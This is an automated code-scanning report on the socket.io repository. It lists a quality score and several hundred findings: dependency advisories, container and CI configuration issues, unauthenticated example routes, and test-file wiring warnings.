64 of your 548 findings came from Repobility's proprietary detections. ✓ Repobility tags below mark them.

Scan timing: clone 4.16s · analysis 86.46s · 17.3 MB · GitHub API rate-limit (preflight)

socketio/socket.io

https://github.com/socketio/socket.io · scanned 2026-06-05 09:06 UTC (5 days, 18 hours ago) · 10 languages

832 raw signals (382 security + 450 graph) · 48th percentile · JavaScript · medium (20-100K LoC) · System graph score 48 (higher by 17)


Complete repo analysis

Last scanned 5 days, 18 hours ago · v2 · 400 actionable findings from 2 signal sources. 207 repeated signals grouped for readability. Security checks, system graph analysis, and verified AI-agent feedback are merged into one review queue.

Score breakdown — 2026-05-18-v5
Component            Sub-score  Weight  Contribution
structure_score           60.0    0.15          9.00
security_score            25.1    0.25          6.28
testing_score             92.0    0.20         18.40
documentation_score       86.6    0.15         12.99
practices_score           74.0    0.15         11.10
code_quality              71.0    0.10          7.10
Overall                           1.00          64.9
Scan summary: Quality grade C+ (65/100). Dimensions: security 25, maintainability 60. 382 findings (223 security). 54,740 lines analyzed.

Showing 353 of 400 actionable findings. 607 raw detector signals were grouped into reader-sized issues.

critical Security checks software dependencies conf 0.88 @babel/traverse: GHSA-67hx-6x53-jw92
Babel vulnerable to arbitrary code execution when compiling specifically crafted malicious code
examples/create-react-app-example/yarn.lock
critical Security checks software dependencies conf 0.88 basic-ftp: GHSA-5rq4-664w-9x2c
Basic FTP has Path Traversal Vulnerability in its downloadToDir() method
package-lock.json
critical Security checks cicd CI/CD security conf 0.96 Compose service contains a literal secret environment value
Literal secrets in Compose files are committed to source and exposed through container inspection.
packages/socket.io-postgres-emitter/compose.yaml:1
CI/CD security · containers
critical Security checks cicd CI/CD security conf 0.98 Compose service mounts the Docker socket
The Docker socket gives the container control over the Docker host and is commonly equivalent to host root access.
examples/cluster-traefik/docker-compose.yml:3
CI/CD security · containers
critical Security checks security secrets conf 0.95 3 occurrences Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
Gitleaks detected a committed secret or credential pattern.
2 files, 3 locations
packages/engine.io/test/server.js:182, 204 (2 hits)
examples/nestjs-example/README.md:5
critical Security checks software dependencies conf 0.88 fast-xml-parser: GHSA-m7jm-9gc2-mpf2
fast-xml-parser has an entity encoding bypass via regex injection in DOCTYPE entity names
examples/ReactNativeExample/yarn.lock
critical Security checks software dependencies conf 0.88 form-data: GHSA-fjxv-7rqg-78g4
form-data uses unsafe random function in form-data for choosing boundary
examples/create-react-app-example/yarn.lock
critical Security checks software dependencies conf 0.88 minimist: GHSA-xvch-5gv4-984h
Prototype Pollution in minimist
packages/engine.io/examples/latency/package-lock.json
critical Security checks software dependencies conf 0.88 shell-quote: GHSA-qg8p-v9q4-gh34
Potential Command Injection in shell-quote
packages/engine.io/examples/latency/package-lock.json
critical Security checks software dependencies conf 0.88 uglify-js: GHSA-34r7-q49f-h37c
Incorrect Handling of Non-Boolean Comparisons During Minification in uglify-js
packages/engine.io/examples/latency/package-lock.json
critical Security checks software dependencies conf 0.88 webpack: GHSA-hc6q-2mpp-qw7j
Cross-realm object access in Webpack 5
examples/create-react-app-example/yarn.lock
low Security checks cicd CI/CD security conf 0.35 ✓ Repobility 8 occurrences Workflow references repository secrets in a pull_request workflow
Fork pull_request runs do not receive normal repository secrets on GitHub Actions. Review this as a reliability/intent signal, not as direct fork-secret exfiltration. Raise severity only for pull_request_target or another trusted-context path that runs untrusted PR code with secrets.
4 files, 8 locations
.github/workflows/ci-engine.io-client.yml:70, 71 (2 hits)
.github/workflows/ci-engine.io-parser.yml:48, 49 (2 hits)
.github/workflows/ci-socket.io-client.yml:75, 76 (2 hits)
.github/workflows/ci-socket.io-parser.yml:49, 50 (2 hits)
CI/CD security · workflow secrets · GitHub Actions
critical System graph security Secrets conf 1.00 Possible secret in packages/socket.io-postgres-emitter/compose.yaml
Detected pattern matching password_literal. Rotate the credential and move to a secret manager.
packages/socket.io-postgres-emitter/compose.yaml:7
high Security checks software dependencies conf 0.88 2 occurrences @babel/plugin-transform-modules-systemjs: GHSA-fv7c-fp4j-7gwp
@babel/plugin-transform-modules-systemjs generates arbitrary code when compiling malicious input
2 files, 2 locations
examples/ReactNativeExample/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-35jp-ww65-95wh
axios Vulnerable to Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-3g43-6gmg-66jw
axios Vulnerable to Credential Theft and Response Hijacking via Prototype Pollution Gadget in Config Merge
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-43fc-jf86-j433
Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-6chq-wfr3-2hj9
Axios: Header Injection via Prototype Pollution
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-777c-7fjr-54vf
Allocation of Resources Without Limits or Throttling in Axios
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-hfxv-24rg-xrqf
Axios: Regular Expression Denial of Service (ReDoS) via Cookie Name Injection
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-j5f8-grm9-p9fc
Axios: Proxy-Authorization header leaks to redirect target when proxy is re-evaluated to direct connection
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-p92q-9vqr-4j8v
Axios: Proxy-Authorization Credential Leak to Origin Server Across HTTP-to-HTTPS Redirect in Axios Node.js HTTP Adapter
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-pf86-5x62-jrwf
Axios: Prototype Pollution Gadgets - Response Tampering, Data Exfiltration, and Request Hijacking
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-pjwm-pj3p-43mv
axios's shouldBypassProxy does not recognize IPv4-mapped IPv6 addresses, allowing NO_PROXY bypass (incomplete fix for CVE-2025-62718)
package-lock.json
high Security checks software dependencies conf 0.88 axios: GHSA-q8qp-cvcw-x6jj
Axios has prototype pollution read-side gadgets in HTTP adapter that allow credential injection and request hijacking
package-lock.json
high Security checks software dependencies conf 0.88 basic-ftp: GHSA-6v7q-wjvx-w8wg
basic-ftp: Incomplete CRLF Injection Protection Allows Arbitrary FTP Command Execution via Credentials and MKD Commands
package-lock.json
high Security checks software dependencies conf 0.88 basic-ftp: GHSA-rp42-5vxx-qpwr
basic-ftp vulnerable to denial of service via unbounded memory consumption in Client.list()
package-lock.json
high Security checks software dependencies conf 0.88 basic-ftp: GHSA-rpmf-866q-6p89
basic-ftp allows a malicious FTP server to cause client-side denial of service via unbounded multiline control response buffering
package-lock.json
high Security checks software dependencies conf 0.90 ✓ Repobility Binary file `examples/ReactNativeExample/android/gradle/wrapper/gradle-wrapper.jar` committed in source repo
`examples/ReactNativeExample/android/gradle/wrapper/gradle-wrapper.jar` is a .jar binary (63,721 bytes) committed to a repo that otherwise has 288 source files. Trojan binaries inside otherwise-normal source repos are a known supply-chain attack: a compromised dependency or PR slips in a binary tha…
examples/ReactNativeExample/android/gradle/wrapper/gradle-wrapper.jar:1
high Security checks software dependencies conf 0.88 body-parser: GHSA-qwcr-r2fm-qrc7
body-parser vulnerable to denial of service when url encoding is enabled
examples/basic-crud-application/vue-client/yarn.lock
high Security checks software dependencies conf 0.88 compressing: GHSA-4c3q-x735-j3r5
Complete Bypass of CVE-2026-24884 Patch via Git-Delivered Symlink Poisoning in compressing
package-lock.json
high Security checks software dependencies conf 0.88 cross-spawn: GHSA-3xgq-45jj-v275
Regular Expression Denial of Service (ReDoS) in cross-spawn
examples/ReactNativeExample/yarn.lock
high Security checks cicd CI/CD security conf 0.90 3 occurrences Database service has no persistent data volume
Database containers store data in the writable container layer unless a volume or bind mount is attached to the image's data directory. Recreating the container can lose state.
3 files, 3 locations
examples/basic-crud-application/server-postgres-cluster/docker-compose.yml:3
examples/postgres-adapter-example/compose.yaml:1
packages/socket.io-postgres-emitter/compose.yaml:1
CI/CD security · containers
high Security checks cicd CI/CD security conf 0.84 8 occurrences Database service publishes a host port
Publishing database ports to the host increases exposure. Internal Compose networking usually only needs expose, not ports.
7 files, 8 locations
packages/socket.io-redis-streams-emitter/compose.yaml:1, 6 (2 hits)
examples/basic-crud-application/server-postgres-cluster/docker-compose.yml:3
examples/cluster-engine-redis/compose.yaml:1
examples/postgres-adapter-example/compose.yaml:1
examples/private-messaging/server/docker-compose.yml:3
packages/socket.io-cluster-engine/compose.yaml:1
packages/socket.io-postgres-emitter/compose.yaml:1
CI/CD security · containers
high Security checks software dependencies conf 0.88 debug: GHSA-9vvw-cc9w-f27h
debug Inefficient Regular Expression Complexity vulnerability
packages/engine.io/examples/latency/package-lock.json
high Security checks cicd CI/CD security conf 0.92 5 occurrences Dockerfile copies the entire context without .dockerignore
COPY . or ADD . sends the full build context to Docker. Without .dockerignore this can include secrets, git history, and local artifacts.
5 files, 5 locations
examples/cluster-haproxy/server/Dockerfile:12
examples/cluster-httpd/server/Dockerfile:12
examples/cluster-nginx/client/Dockerfile:12
examples/cluster-nginx/server/Dockerfile:12
examples/cluster-traefik/server/Dockerfile:12
CI/CD security · containers
high Security checks software dependencies conf 0.90 ✓ Repobility 7 occurrences Dockerfile FROM `node:14-alpine` not pinned by digest
`FROM node:14-alpine` resolves the tag at build time. The registry CAN re-push a different image for the same tag, so every build is potentially different. Production images should pin to `image@sha256:...` for reproducibility + supply-chain integrity.
7 files, 7 locations
examples/cluster-haproxy/server/Dockerfile:1
examples/cluster-httpd/server/Dockerfile:1
examples/cluster-nginx/client/Dockerfile:1
examples/cluster-nginx/server/Dockerfile:1
examples/cluster-traefik/server/Dockerfile:1
examples/connection-state-recovery-example/cjs/.codesandbox/Dockerfile:1
examples/connection-state-recovery-example/esm/.codesandbox/Dockerfile:1
high Security checks quality Quality conf 0.80 ✓ Repobility 3 occurrences Express POST /incr has no auth
Express route POST /incr declared without an auth middleware in its handler chain. Destructive methods (POST/PUT/DELETE/PATCH) on unauthenticated routes are OWASP A01:2021 broken access control.
3 files, 3 locations
examples/express-session-example/cjs/index.js:24
examples/express-session-example/esm/index.js:23
examples/express-session-example/ts/index.ts:30
high Security checks quality Quality conf 0.80 ✓ Repobility 3 occurrences Express POST /login has no auth
Express route POST /login declared without an auth middleware in its handler chain. Destructive methods (POST/PUT/DELETE/PATCH) on unauthenticated routes are OWASP A01:2021 broken access control.
3 files, 3 locations
examples/passport-jwt-example/cjs/index.js:36
examples/passport-jwt-example/esm/index.js:37
examples/passport-jwt-example/ts/index.ts:47
high Security checks quality Quality conf 0.80 ✓ Repobility 3 occurrences Express POST /logout has no auth
Express route POST /logout declared without an auth middleware in its handler chain. Destructive methods (POST/PUT/DELETE/PATCH) on unauthenticated routes are OWASP A01:2021 broken access control.
3 files, 3 locations
examples/express-session-example/cjs/index.js:32
examples/express-session-example/esm/index.js:31
examples/express-session-example/ts/index.ts:38
high Security checks software dependencies conf 0.88 fast-xml-parser: GHSA-8gc5-j5rx-235r
fast-xml-parser affected by numeric entity expansion bypassing all entity expansion limits (incomplete fix for CVE-2026-26278)
examples/ReactNativeExample/yarn.lock
high Security checks software dependencies conf 0.88 fast-xml-parser: GHSA-mpg4-rc92-vx8v
fast-xml-parser vulnerable to ReDOS at currency parsing
examples/ReactNativeExample/yarn.lock
high Security checks software dependencies conf 0.88 flatted: GHSA-25h7-pfq9-p65f
flatted vulnerable to unbounded recursion DoS in parse() revive phase
examples/ReactNativeExample/yarn.lock
high Security checks software dependencies conf 0.88 flatted: GHSA-rf6f-7fwh-wjgh
Prototype Pollution via parse() in NodeJS flatted
examples/ReactNativeExample/yarn.lock
low Security checks cicd CI/CD security conf 0.90 ✓ Repobility 53 occurrences GitHub Action is tag-pinned rather than SHA-pinned
Action `actions/checkout` pinned to mutable ref `@v6` uses a mutable tag or branch. Pin external actions to a reviewed full commit SHA when the workflow is security-sensitive.
12 files, 48 locations
.github/workflows/build-examples.yml:34, 37 (4 hits)
.github/workflows/ci-engine.io-client.yml:31, 34 (4 hits)
.github/workflows/ci-engine.io-parser.yml:25, 28 (4 hits)
.github/workflows/ci-engine.io.yml:31, 34 (4 hits)
.github/workflows/ci-socket.io-adapter.yml:38, 41 (4 hits)
.github/workflows/ci-socket.io-client.yml:39, 42 (4 hits)
.github/workflows/ci-socket.io-cluster-adapter.yml:41, 44 (4 hits)
.github/workflows/ci-socket.io-cluster-engine.yml:52, 55 (4 hits)
CI/CD security · Supply chain · GitHub Actions
high Security checks software dependencies conf 0.88 glob: GHSA-5j98-mcp5-4vw2
glob CLI: Command injection via -c/--cmd executes matches with shell:true
package-lock.json
high Security checks software dependencies conf 0.88 http-proxy-middleware: GHSA-c7qv-q95q-8v27
Denial of service in http-proxy-middleware
examples/basic-crud-application/vue-client/yarn.lock
high Security checks software dependencies conf 0.88 image-size: GHSA-m5qc-5hw7-8vg7
image-size Denial of Service via Infinite Loop during Image Processing
examples/ReactNativeExample/yarn.lock
high Security checks software dependencies conf 0.88 launch-editor: GHSA-c27g-q93r-2cwf
launch-editor vulnerable to command injection via the crafted request on Windows
examples/basic-crud-application/vue-client/yarn.lock
high Security checks software dependencies conf 0.88 2 occurrences lodash: GHSA-r5fr-rjxr-66jc
lodash vulnerable to Code Injection via `_.template` imports key names
2 files, 2 locations
examples/ReactNativeExample/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 mime: GHSA-wrvr-8mpx-r7pp
mime Regular Expression Denial of Service when MIME lookup performed on untrusted user input
packages/engine.io/examples/latency/package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences minimatch: GHSA-23c5-xmqv-rm74
minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences minimatch: GHSA-3ppc-4f35-3m26
minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences minimatch: GHSA-7r86-cg39-jmmj
minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
high Security checks software dependencies conf 0.88 minimatch: GHSA-hxm2-r34f-qmc5
Regular Expression Denial of Service in minimatch
packages/engine.io/examples/latency/package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences node-forge: GHSA-2328-f5f3-gj25
Forge has a basicConstraints bypass in its certificate chain verification (RFC 5280 violation)
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences node-forge: GHSA-554w-wpv2-vw27
node-forge has ASN.1 Unbounded Recursion
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences node-forge: GHSA-5gfm-wpxj-wjgq
node-forge has an Interpretation Conflict vulnerability via its ASN.1 Validator Desynchronization
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences node-forge: GHSA-5m6q-g25r-mvwx
Forge has Denial of Service via Infinite Loop in BigInteger.modInverse() with Zero Input
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences node-forge: GHSA-ppp5-5v6c-4jwp
Forge has signature forgery in RSA-PKCS due to ASN.1 extra field
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences node-forge: GHSA-q67f-28xg-22rw
Forge has signature forgery in Ed25519 due to missing S > L check
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 nth-check: GHSA-rp65-9cf3-cjxr
Inefficient Regular Expression Complexity in nth-check
examples/create-react-app-example/yarn.lock
high Security checks software dependencies conf 0.90 ✓ Repobility package.json dep `uWebSockets.js` pulled from URL/Git
`devDependencies.uWebSockets.js` = `github:uNetworking/uWebSockets.js#v20.56.0` bypasses the npm registry. No integrity hash, no version locking, no registry-side scanning. If the URL or git host is compromised, every `npm install` pulls the new payload.
package.json:1
high Security checks software dependencies conf 0.88 2 occurrences path-to-regexp: GHSA-37ch-88jc-xwx2
path-to-regexp vulnerable to Regular Expression Denial of Service via multiple route parameters
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 path-to-regexp: GHSA-9wv6-86v2-598j
path-to-regexp outputs backtracking regular expressions
examples/basic-crud-application/vue-client/yarn.lock
high Security checks software dependencies conf 0.88 path-to-regexp: GHSA-rhx6-c78j-4q9w
path-to-regexp contains a ReDoS
examples/basic-crud-application/vue-client/yarn.lock
high Security checks software dependencies conf 0.88 2 occurrences picomatch: GHSA-c2c7-rcm5-vvqj
Picomatch has a ReDoS vulnerability via extglob quantifiers
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
high Security checks software dependencies conf 0.88 rollup: GHSA-gcx4-mw62-g8wm
DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS
examples/create-react-app-example/yarn.lock
high Security checks software dependencies conf 0.88 2 occurrences rollup: GHSA-mw96-cpmx-2vgc
Rollup 4 has Arbitrary File Write via Path Traversal
2 files, 2 locations
examples/create-react-app-example/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 semver: GHSA-c2qf-rxjj-qqgw
semver vulnerable to Regular Expression Denial of Service
examples/create-react-app-example/yarn.lock
high Security checks software dependencies conf 0.88 2 occurrences serialize-javascript: GHSA-5c6j-r48x-rmvq
Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences socket.io-parser: GHSA-677m-j7p3-52f9
socket.io allows an unbounded number of binary attachments
2 files, 2 locations
examples/ReactNativeExample/yarn.lock
package-lock.json
high Security checks software dependencies conf 0.88 svgo: GHSA-xpqw-6gx7-v673
SVGO DoS through entity expansion in DOCTYPE (Billion Laughs)
examples/basic-crud-application/vue-client/yarn.lock
high Security checks software dependencies conf 0.88 2 occurrences tar-fs: GHSA-8cj5-5rvv-wf4v
tar-fs can extract outside the specified dir with a specific tarball
2 files, 2 locations
package-lock.json
packages/engine.io/examples/memory-usage-webtransport/package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences tar-fs: GHSA-pq67-2wwv-3xjx
tar-fs Vulnerable to Link Following and Path Traversal via Extracting a Crafted tar File
2 files, 2 locations
package-lock.json
packages/engine.io/examples/memory-usage-webtransport/package-lock.json
high Security checks software dependencies conf 0.88 2 occurrences tar-fs: GHSA-vj76-c3g6-qr5v
tar-fs has a symlink validation bypass if destination directory is predictable with a specific tarball
2 files, 2 locations
package-lock.json
packages/engine.io/examples/memory-usage-webtransport/package-lock.json
high Security checks software dependencies conf 0.88 tar: GHSA-34x7-hfp2-rc4v
node-tar Vulnerable to Arbitrary File Creation/Overwrite via Hardlink Path Traversal
package-lock.json
high Security checks software dependencies conf 0.88 tar: GHSA-83g3-92jg-28cx
Arbitrary File Read/Write via Hardlink Target Escape Through Symlink Chain in node-tar Extraction
package-lock.json
high Security checks software dependencies conf 0.88 tar: GHSA-8qq5-rm4j-mr97
node-tar is Vulnerable to Arbitrary File Overwrite and Symlink Poisoning via Insufficient Path Sanitization
package-lock.json
high Security checks software dependencies conf 0.88 tar: GHSA-9ppj-qmqm-q256
node-tar Symlink Path Traversal via Drive-Relative Linkpath
package-lock.json
high Security checks software dependencies conf 0.88 tar: GHSA-qffp-2rhf-9h96
tar has Hardlink Path Traversal via Drive-Relative Linkpath
package-lock.json
high Security checks software dependencies conf 0.88 tar: GHSA-r6q2-hw4h-h46w
Race Condition in node-tar Path Reservations via Unicode Ligature Collisions on macOS APFS
package-lock.json
high Security checks software dependencies conf 0.88 tmp: GHSA-ph9p-34f9-6g65
tmp has Path Traversal via unsanitized prefix/postfix that enables directory escape
package-lock.json
high Security checks software dependencies conf 0.88 uglify-js: GHSA-c9f4-xj24-8jqx
Regular Expression Denial of Service in uglify-js
packages/engine.io/examples/latency/package-lock.json
high Security checks software dependencies conf 0.88 webpack-dev-middleware: GHSA-wr3j-pwj9-hqq6
Path traversal in webpack-dev-middleware
examples/basic-crud-application/vue-client/yarn.lock
high Security checks software dependencies conf 0.90 ✓ Repobility 3 occurrences Workflow container/services image `redis:7` unpinned
`container/services image: redis:7` without `@sha256:...` pulls a mutable tag at workflow-run time. Treat workflow container references with the same supply-chain discipline as Dockerfile FROM lines.
3 files, 3 locations
.github/workflows/ci-socket.io-cluster-engine.yml:41
.github/workflows/ci-socket.io-postgres-emitter.yml:41
.github/workflows/ci-socket.io-redis-streams-emitter.yml:41
high Security checks software dependencies conf 0.88 ws: GHSA-3h5v-q93c-6h6q
ws affected by a DoS when handling a request with many HTTP headers
examples/ReactNativeExample/yarn.lock
high System graph api Wiring conf 1.00 Dangling fetch: GET http://localhost:${getPort(io)} (packages/socket.io/test/server-attachment.ts:197)
`packages/socket.io/test/server-attachment.ts:197` calls `GET http://localhost:${getPort(io)}` but no backend route matches that path. This is a runtime 404 waiting to happen. Tool: helper:request Normalized path used for matching: `/http:/localhost:/<p>` If this points at an external API, prefix …
Dangling fetch · helper:request
high System graph api Wiring conf 1.00 Dangling fetch: GET http://localhost:${getPort(io)} (packages/socket.io/test/server-attachment.ts:205)
`packages/socket.io/test/server-attachment.ts:205` calls `GET http://localhost:${getPort(io)}` but no backend route matches that path. This is a runtime 404 waiting to happen. Tool: helper:request Normalized path used for matching: `/http:/localhost:/<p>` If this points at an external API, prefix …
Dangling fetch · helper:request
high System graph api Wiring conf 1.00 Dangling fetch: GET http://localhost:${port} (packages/socket.io/test/uws.ts:234)
`packages/socket.io/test/uws.ts:234` calls `GET http://localhost:${port}` but no backend route matches that path. This is a runtime 404 waiting to happen. Tool: helper:request Normalized path used for matching: `/http:/localhost:/<p>` If this points at an external API, prefix it with `https://` so…
Dangling fetch · helper:request
high System graph api Wiring conf 1.00 Dangling fetch: POST http://localhost:${port}/engine.io/?EIO=4&transport=polling&sid=${sid} (packages/engine.io/test/server.js:1471)
`packages/engine.io/test/server.js:1471` calls `POST http://localhost:${port}/engine.io/?EIO=4&transport=polling&sid=${sid}` but no backend route matches that path. This is a runtime 404 waiting to happen. Tool: fetch Normalized path used for matching: `/http:/localhost:/<p>/engine.io` If this poi…
Dangling fetch · fetch
medium Security checks software dependencies conf 0.88 @adobe/css-tools: GHSA-hpx4-r86g-5jrg
@adobe/css-tools Regular Expression Denial of Service (ReDOS) while Parsing CSS
examples/create-react-app-example/yarn.lock
medium Security checks software dependencies conf 0.88 @adobe/css-tools: GHSA-prr3-c3m5-p7q2
@adobe/css-tools Improper Input Validation and Inefficient Regular Expression Complexity
examples/create-react-app-example/yarn.lock
medium Security checks software dependencies conf 0.88 @babel/helpers: GHSA-968p-4wvh-cqc8
Babel has inefficient RegExp complexity in generated code with .replace when transpiling named capturing groups
examples/ReactNativeExample/yarn.lock
medium Security checks software dependencies conf 0.88 @babel/runtime: GHSA-968p-4wvh-cqc8
Babel has inefficient RegExp complexity in generated code with .replace when transpiling named capturing groups
examples/ReactNativeExample/yarn.lock
medium Security checks security auth conf 0.92 [AUC001] No Repobility access matrix policy found
The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation.
high Security checks security auth conf 0.74 [AUC002] Low visible authorization coverage in route inventory
Only 0.0% of discovered routes show nearby authentication, authorization, middleware, or public-route evidence.
medium Security checks software dependencies conf 0.88 2 occurrences ajv: GHSA-2g4f-4pwh-qvx6
ajv has ReDoS when using `$data` option
2 files, 2 locations
examples/ReactNativeExample/yarn.lock
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-3w6x-2g7m-8v23
Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget in `parseReviver`
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-445q-vr5w-6q77
Axios: CRLF Injection in multipart/form-data body via unsanitized blob.type in formDataToStream
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-5c9x-8gcm-mpgx
Axios' HTTP adapter-streamed uploads bypass maxBodyLength when maxRedirects: 0
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-62hf-57xw-28j9
Axios: unbounded recursion in toFormData causes DoS via deeply nested request data
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-898c-q2cr-xwhg
axios has DoS & Header Injection via Prototype Pollution Read-Side Gadgets in axios merge functions
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-fvcv-3m26-pcqx
Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-m7pr-hjqh-92cm
Axios: no_proxy bypass via IP alias allows SSRF
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-vf2m-468p-8v99
Axios: HTTP adapter streamed responses bypass maxContentLength
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-w9j2-pvgh-6h63
Axios: Authentication Bypass via Prototype Pollution Gadget in `validateStatus` Merge Strategy
package-lock.json
medium Security checks software dependencies conf 0.88 axios: GHSA-xx6v-rp6x-q39c
Axios: XSRF Token Cross-Origin Leakage via Prototype Pollution Gadget in `withXSRFToken` Boolean Coercion
package-lock.json
medium Security checks software dependencies conf 0.88 2 occurrences brace-expansion: GHSA-f886-m6hf-6m8v
brace-expansion: Zero-step sequence causes process hang and memory exhaustion
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
medium Security checks cicd CI/CD security conf 0.56 Compose service contains a literal secret environment value
Literal secrets in Compose files are committed to source and exposed through container inspection.
examples/postgres-adapter-example/compose.yaml:1
CI/CD security · containers
medium Security checks cicd CI/CD security conf 0.56 Compose service contains a literal secret environment value
Literal secrets in Compose files are committed to source and exposed through container inspection.
examples/basic-crud-application/server-postgres-cluster/docker-compose.yml:3
CI/CD security · containers
medium Security checks cicd CI/CD security conf 0.88 3 occurrences Database service has no healthcheck
Compose starts dependent containers in dependency order, but it does not wait for a database to be ready unless a healthcheck is defined and dependents use service_healthy.
3 files, 3 locations
examples/basic-crud-application/server-postgres-cluster/docker-compose.yml:3
examples/postgres-adapter-example/compose.yaml:1
packages/socket.io-postgres-emitter/compose.yaml:1
CI/CD security · containers
medium Security checks cicd CI/CD security conf 0.74 9 occurrences Database service has no persistent data volume
Database containers store data in the writable container layer unless a volume or bind mount is attached to the image's data directory. Recreating the container can lose state.
8 files, 9 locations
packages/socket.io-redis-streams-emitter/compose.yaml:1, 6 (2 hits)
examples/cluster-engine-redis/compose.yaml:1
examples/cluster-haproxy/docker-compose.yml:49
examples/cluster-httpd/docker-compose.yml:49
examples/cluster-nginx/docker-compose.yml:54
examples/cluster-traefik/docker-compose.yml:23
examples/private-messaging/server/docker-compose.yml:3
packages/socket.io-cluster-engine/compose.yaml:1
CI/CD security · containers
medium Security checks cicd CI/CD security conf 0.90 Docker build context has no .dockerignore
Without .dockerignore, build context can include source history, local env files, dependencies, and generated artifacts.
.dockerignore
CI/CD security · containers
high Security checks cicd CI/CD security conf 0.82 7 occurrences Docker final stage has no non-root USER
Docker images run as root unless the image or Dockerfile switches to a non-root user.
7 files, 7 locations
examples/cluster-haproxy/server/Dockerfile:1
examples/cluster-httpd/server/Dockerfile:1
examples/cluster-nginx/client/Dockerfile:1
examples/cluster-nginx/server/Dockerfile:1
examples/cluster-traefik/server/Dockerfile:1
examples/connection-state-recovery-example/cjs/.codesandbox/Dockerfile:1
examples/connection-state-recovery-example/esm/.codesandbox/Dockerfile:1
CI/CD security · containers
medium Security checks software dependencies conf 0.88 ejs: GHSA-ghr5-ch3p-vcr6
ejs lacks certain pollution protection
examples/create-react-app-example/yarn.lock
medium Security checks software dependencies conf 0.88 engine.io: GHSA-q9mw-68c2-j6m5
engine.io Uncaught Exception vulnerability
examples/create-react-app-example/yarn.lock
medium Security checks software dependencies conf 0.88 express: GHSA-rv95-896h-c2vc
Express.js Open Redirect in malformed URLs
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 fast-xml-parser: GHSA-gh4j-gqv2-49f6
fast-xml-parser XMLBuilder: XML Comment and CDATA Injection via Unescaped Delimiters
examples/ReactNativeExample/yarn.lock
medium Security checks software dependencies conf 0.88 fast-xml-parser: GHSA-jp2q-39xq-3w4g
Entity Expansion Limits Bypassed When Set to Zero Due to JavaScript Falsy Evaluation in fast-xml-parser
examples/ReactNativeExample/yarn.lock
medium Security checks software dependencies conf 0.88 follow-redirects: GHSA-cxjh-pqwp-8mfp
follow-redirects' Proxy-Authorization header kept across hosts
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 follow-redirects: GHSA-jchw-25xp-jwwc
Follow Redirects improperly handles URLs in the url.parse() function
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 2 occurrences follow-redirects: GHSA-r4q5-vmmm-2653
follow-redirects leaks Custom Authentication Headers to Cross-Domain Redirect Targets
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
medium Security checks software dependencies conf 0.88 http-proxy-middleware: GHSA-4www-5p9h-95mh
http-proxy-middleware can call writeBody twice because "else if" is not used
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 http-proxy-middleware: GHSA-9gqv-wp59-fq42
http-proxy-middleware allows fixRequestBody to proceed even if bodyParser has failed
examples/basic-crud-application/vue-client/yarn.lock
